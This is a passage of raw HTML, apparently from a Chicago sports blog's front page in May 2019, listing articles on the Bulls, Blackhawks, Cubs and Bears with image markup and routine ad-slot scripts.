https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?zoom=3&amp;resize=800%2C450&amp;ssl=1 2400w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="47266" data-permalink="https://theloopsports.com/2019/03/25/bulls-tom-izzo-jim-boylen-and-the-upside-of-honest-coaching/d7cc8514-152c-4bf4-b01f-bccd7d9c1461/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?fit=3024%2C3780&amp;ssl=1" data-orig-size="3024,3780" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;1.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 8 Plus&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1553364116&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;3.99&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="D7CC8514-152C-4BF4-B01F-BCCD7D9C1461" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?fit=240%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?fit=819%2C1024&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/10/boylen-extension-shows-how-out-of-touch-bulls-are-with-their-fans/" rel="bookmark">Boylen Extension Shows How Out of Touch Bulls Are With Their Fans</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> <article id="post-48271" class="post-48271 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-blackhawks category-editorials tag-chicago-blackhawks tag-editorials"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2019/05/01/blackhawks-dylan-strome-to-represent-team-canada-at-2019-iihf-world-championships/"><img width="800" height="450" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?zoom=2&amp;resize=800%2C450&amp;ssl=1 1600w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?zoom=3&amp;resize=800%2C450&amp;ssl=1 2400w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="47110" data-permalink="https://theloopsports.com/img_3520/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?fit=4032%2C3024&amp;ssl=1" data-orig-size="4032,3024" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;1.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 8 Plus&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1552331351&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;3.99&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.0083333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_3520" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?fit=300%2C225&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3520.jpg?fit=950%2C713&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/blackhawks/" rel="category tag">Blackhawks</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/01/blackhawks-dylan-strome-to-represent-team-canada-at-2019-iihf-world-championships/" rel="bookmark">Blackhawks&#8217; Dylan Strome to Represent Team Canada at 2019 IIHF World Championships</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> <article id="post-48047" class="post-48047 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears category-editorials tag-chicago-bears"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2019/04/23/bears-scouting-report-nick-allegretti/"><img width="800" height="450" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="45974" data-permalink="https://theloopsports.com/screen-shot-2019-02-15-at-8-16-43-pm/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=1338%2C826&amp;ssl=1" data-orig-size="1338,826" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=300%2C185&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=950%2C586&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/23/bears-scouting-report-nick-allegretti/" rel="bookmark">Bears: Illinois OL Nick Allegretti is a Late-Round Sleeper</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> <article id="post-48041" class="post-48041 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears category-editorials tag-chicago-bears"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2019/04/22/should-the-bears-take-pass-catching%e2%80%8b-back-james-williams-to-replace-jordan-howard/"><img width="800" height="450" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 800px) 100vw, 800px" data-attachment-id="45974" data-permalink="https://theloopsports.com/screen-shot-2019-02-15-at-8-16-43-pm/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=1338%2C826&amp;ssl=1" data-orig-size="1338,826" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=300%2C185&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?fit=950%2C586&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/22/should-the-bears-take-pass-catching%e2%80%8b-back-james-williams-to-replace-jordan-howard/" rel="bookmark">Should the Bears take Pass-Catching​ Back James Williams to Replace Jordan Howard?</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> <article id="post-48061" class="post-48061 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears category-editorials tag-chicago-bears"> <div class="entry-thumbnail fadein"><a href="https://theloopsports.com/2019/04/22/why-the-bears-should-stay-away-from-ryquell-armstead/"><img width="800" height="450" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?resize=800%2C450&amp;ssl=1" class="attachment-nikau-front-small size-nikau-front-small wp-post-image" alt="" data-attachment-id="46296" data-permalink="https://theloopsports.com/screen-shot-2019-02-20-at-10-42-41-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?fit=958%2C710&amp;ssl=1" data-orig-size="958,710" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Bears" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?fit=300%2C222&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.41-PM.png?fit=950%2C704&amp;ssl=1" /></a></div><!-- end .entry-thumbnail --> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bears/" rel="category tag">Bears</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/04/22/why-the-bears-should-stay-away-from-ryquell-armstead/" rel="bookmark">Why the Bears Should Stay Away from Ryquell Armstead</a></h2> </header><!-- end .entry-header --> </article><!-- #post-## --> </div><!-- end .section-one-column-two --> </section><!-- end #front-section-one --> <div id="blog-wrap" class="blog-wrap cf"> <div id="primary" class="site-content cf" role="main"> <h3 class="blog-title">Latest Posts</h3> <article id="post-48595" class="cf post-48595 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bulls tag-chicago-bulls tag-draft-lottery tag-nba-draft"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/14/bulls-draw-number-seven-at-draft-lottery/"><img width="960" height="576" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.19-PM.png?resize=960%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="" data-attachment-id="46297" data-permalink="https://theloopsports.com/2019/03/14/is-it-time-for-the-bulls-to-shut-lavine-down/screen-shot-2019-02-20-at-10-42-19-pm/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.19-PM.png?fit=960%2C716&amp;ssl=1" data-orig-size="960,716" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Bulls" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.19-PM.png?fit=300%2C224&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-20-at-10.42.19-PM.png?fit=950%2C709&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/katyeduffy/">katyeduffy</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/14/bulls-draw-number-seven-at-draft-lottery/">May 14, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/14/bulls-draw-number-seven-at-draft-lottery/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/14/bulls-draw-number-seven-at-draft-lottery/" rel="bookmark">Bulls Draw Number Seven at Draft Lottery</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>The Chicago Bulls ended up with the seventh overall pick in the NBA Draft Lottery on Tuesday night. Katy has her initial reaction and what this means</p> <div class="wpcnt"> <div class="wpa"> <span class="wpa-about">Advertisements</span> <div class="u belowpost"> <div style="padding-bottom:15px;width:300px;height:250px;float:left;margin-right:5px;margin-top:0px;"> <div id="atatags-2-5cdd694f14374"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-2-5cdd694f14374', { collapseEmpty: 'before', sectionId: '1211158871', location: 120, width: 300, height: 250 }); }); </script> </div> </div> <div style="padding-bottom:15px;width:300px;height:250px;float:left;margin-top:0px;"> <div id="atatags-3-5cdd694f1437d"> <script type="text/javascript"> __ATA.cmd.push(function() { __ATA.initSlot('atatags-3-5cdd694f1437d', { collapseEmpty: 'before', sectionId: '1211158874', location: 130, width: 300, height: 250 }); }); </script> </div> </div> </div> </div> </div> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48595 --> <article id="post-48539" class="cf post-48539 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-blackhawks category-editorials tag-chicago-blackhawks tag-editorials"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/"><img width="1024" height="576" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="" srcset="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?resize=800%2C450&amp;ssl=1 800w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?zoom=2&amp;resize=1024%2C576&amp;ssl=1 2048w, https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?zoom=3&amp;resize=1024%2C576&amp;ssl=1 3072w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="47107" data-permalink="https://theloopsports.com/img_3519/" data-orig-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?fit=4032%2C3024&amp;ssl=1" data-orig-size="4032,3024" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;1.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 8 Plus&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1552331347&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;3.99&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.0083333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_3519" data-image-description="" data-medium-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?fit=300%2C225&amp;ssl=1" data-large-file="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/03/img_3519.jpg?fit=950%2C713&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/juliakender/">juliakender</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/">May 13, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/blackhawks/" rel="category tag">Blackhawks</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/" rel="bookmark">Blackhawks Prospect Report: Goalie Kevin Lankinen</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>The Blackhawks goalie prospect Kevin Lankinen is turning heads with his performance for team Finland at Worlds. Finland had a<a class="more-link" href="https://theloopsports.com/2019/05/13/blackhawks-prospect-report-goalie-kevin-lankinen/">Continue Reading</a></p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48539 --> <article id="post-48516" class="cf post-48516 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bulls category-editorials tag-bulls tag-chicago-bulls tag-editorials tag-gar-forman tag-jim-boylen tag-john-paxson tag-michael-reinsdorf"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/10/boylen-extension-shows-how-out-of-touch-bulls-are-with-their-fans/"><img width="1024" height="576" src="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="" srcset="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=1024%2C576&amp;ssl=1 1024w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=1260%2C709&amp;ssl=1 1260w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?resize=800%2C450&amp;ssl=1 800w, https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?zoom=2&amp;resize=1024%2C576&amp;ssl=1 2048w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="47266" data-permalink="https://theloopsports.com/2019/03/25/bulls-tom-izzo-jim-boylen-and-the-upside-of-honest-coaching/d7cc8514-152c-4bf4-b01f-bccd7d9c1461/" data-orig-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?fit=3024%2C3780&amp;ssl=1" data-orig-size="3024,3780" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;1.8&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 8 Plus&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1553364116&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;3.99&quot;,&quot;iso&quot;:&quot;32&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="D7CC8514-152C-4BF4-B01F-BCCD7D9C1461" data-image-description="" data-medium-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?fit=240%2C300&amp;ssl=1" data-large-file="https://i2.wp.com/theloopsports.com/wp-content/uploads/2019/03/D7CC8514-152C-4BF4-B01F-BCCD7D9C1461.jpg?fit=819%2C1024&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/katyeduffy/">katyeduffy</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/10/boylen-extension-shows-how-out-of-touch-bulls-are-with-their-fans/">May 10, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/10/boylen-extension-shows-how-out-of-touch-bulls-are-with-their-fans/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/analysis/" rel="category tag">Analysis</a> <a href="https://theloopsports.com/category/bulls/" rel="category tag">Bulls</a> <a href="https://theloopsports.com/category/editorials/" rel="category tag">Editorials</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/10/boylen-extension-shows-how-out-of-touch-bulls-are-with-their-fans/" rel="bookmark">Boylen Extension Shows How Out of Touch Bulls Are With Their Fans</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>The Bulls made their contract extension with Jim Boylen official last week, signing the head coach to a reported three-year contract.</p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48516 --> <article id="post-48525" class="cf post-48525 post type-post status-publish format-standard has-post-thumbnail hentry category-cubs category-game-story tag-addison-russell tag-chicago-cubs tag-javier-baez tag-jose-quintana tag-mlb"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/10/cubs-quintana-quality-milwaukee/"><img width="1024" height="576" src="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="Cubs" srcset="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1024%2C576&amp;ssl=1 1024w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=1260%2C709&amp;ssl=1 1260w, https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?resize=800%2C450&amp;ssl=1 800w" sizes="(max-width: 1024px) 100vw, 1024px" data-attachment-id="45973" data-permalink="https://theloopsports.com/2019/03/31/cubs-back-forth-rangers/screen-shot-2019-02-15-at-8-34-06-pm/" data-orig-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=1272%2C790&amp;ssl=1" data-orig-size="1272,790" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Cubs" data-image-description="" data-medium-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=300%2C186&amp;ssl=1" data-large-file="https://i1.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.34.06-PM.png?fit=950%2C590&amp;ssl=1" /></a> </div><!-- end .entry-thumbnail --> <div class="meta-main-wrap"> <div class="entry-meta"> <span class="entry-author"> by <span class="author vcard"><a class="url fn n" href="https://theloopsports.com/author/dannyd52/">Daniel Shepard</a></span></span> <span class="entry-date"> <a href="https://theloopsports.com/2019/05/10/cubs-quintana-quality-milwaukee/">May 10, 2019</a> </span><!-- end .entry-date --> <span class="entry-comments"> <a href="https://theloopsports.com/2019/05/10/cubs-quintana-quality-milwaukee/#respond"><span class="screen-reader-text">Number of comments</span><span class="leave-reply">0</span></a> </span><!-- end .entry-comments --> </div><!-- end .entry-meta --> <div class="entry-main"> <header class="entry-header"> <div class="entry-cats"> <a href="https://theloopsports.com/category/cubs/" rel="category tag">Cubs</a> <a href="https://theloopsports.com/category/game-story/" rel="category tag">Game Story</a> </div><!-- end .entry-cats --> <h2 class="entry-title"><a href="https://theloopsports.com/2019/05/10/cubs-quintana-quality-milwaukee/" rel="bookmark">Cubs: Quintana Posts Quality Outing in 7-0 Loss to Milwaukee</a></h2> </header><!-- end .entry-header --> <div class="entry-summary"> <p>Jose Quintana was sharp on Friday, but the Cubs&#8217; offense faltered in a 7-0 loss to the Milwaukee Brewers. Daniel Shepard has the details of the loss here.</p> </div><!-- .entry-summary --> </div><!-- .entry-main --> </div><!-- .meta-main-wrap --> </article><!-- end post -48525 --> <article id="post-48490" class="cf post-48490 post type-post status-publish format-standard has-post-thumbnail hentry category-analysis category-bears tag-chicago-bears"> <div class="entry-thumbnail fadein"> <a href="https://theloopsports.com/2019/05/10/which-veteran-players-could-be-in-their-last-year-with-the-bears/"><img width="1024" height="576" src="https://i0.wp.com/theloopsports.com/wp-content/uploads/2019/02/Screen-Shot-2019-02-15-at-8.16.43-PM.png?resize=1024%2C576&amp;ssl=1" class="attachment-nikau-standard-blog size-nikau-standard-blog wp-post-image" alt="" 